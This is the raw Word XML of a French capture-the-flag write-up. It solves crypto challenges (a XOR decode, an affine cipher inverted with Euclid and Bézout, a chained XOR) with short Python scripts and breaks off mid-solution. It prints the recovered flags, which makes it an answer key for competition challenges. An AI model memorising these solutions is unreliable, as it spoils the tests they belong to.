                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"YOU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>HAVE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>TO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>FIND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>THE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>KEY"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"Python</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>widely</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>used</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>general-purpose,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>high-level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>programming</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>language"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>print</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>join</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>([</w:t>
            </w:r>
            <w:r>
              <w:t>chr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])^</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>xrange</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>))])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Le script python nous retourne le flag suivant :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ese{easy_or_not]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc208074189"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 100 - Euclide</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’épreuve contenait un fichier texte et un script python qui a servi à le chiffrer. On parcourt le script pour identifier la méthode de chiffrement ci-dessous :</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crypt(</w:t>
            </w:r>
            <w:r>
              <w:t>P</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p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>P</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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>append</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>chr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>((</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</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rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>''</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>join</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>La première solution consiste à utiliser le théorme d’Euclide et Bézout:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>f(x) = 42x + 18[127]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Avec Euclide on obtient 127 = 42 * 3 + 1 et d’après le théorème de Bézout on a deux entiers relatifs u et v tels que 42u + 127v = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On identifie facilement u = -3 et v = 1 (remontée d’euclide ou visuellement), soit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>g(x) la fonction inverse de f(x)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> telle que g(x) = x*u + 18u avec u = -3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Finalement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>g(x) = -3*x + 54[127]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On peut aussi tenter une approche plus informatique que mathématique, celle-ci consiste à générer une table de correspondance pour chaque caractère dans un charset.</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gen_crypt_table():</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t>range</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>255</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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>append</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>chr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>((</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">’exécution de ce code nous ressort le flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESE{EuclideWasAGoodMan}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc654825164"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 100 - Chain reaction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Cette fois-ci aucune indication n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’est donnée, l’épreuve ci-dessous est un texte chiffré et contient un flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>22#22#30#12#71#71#40#39#72#66#45#60#11#92#5#95#49#41#69#65#11#38#44#64#80#22#7#65#108#44#67#111#28#23#18#59#93#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On se rend compte que les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>‘#’ sont récurrents comme des séparateurs, le titre nous met sur la piste d’un chiffrement en chaîne. On tente de déchiffrer le message en partant du principe qu’il commence par ‘ese’.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On essaie de xorer les caractères entre eux car e^s = s^e = 22 et bizaremment c’est le début d’un flag.</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t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
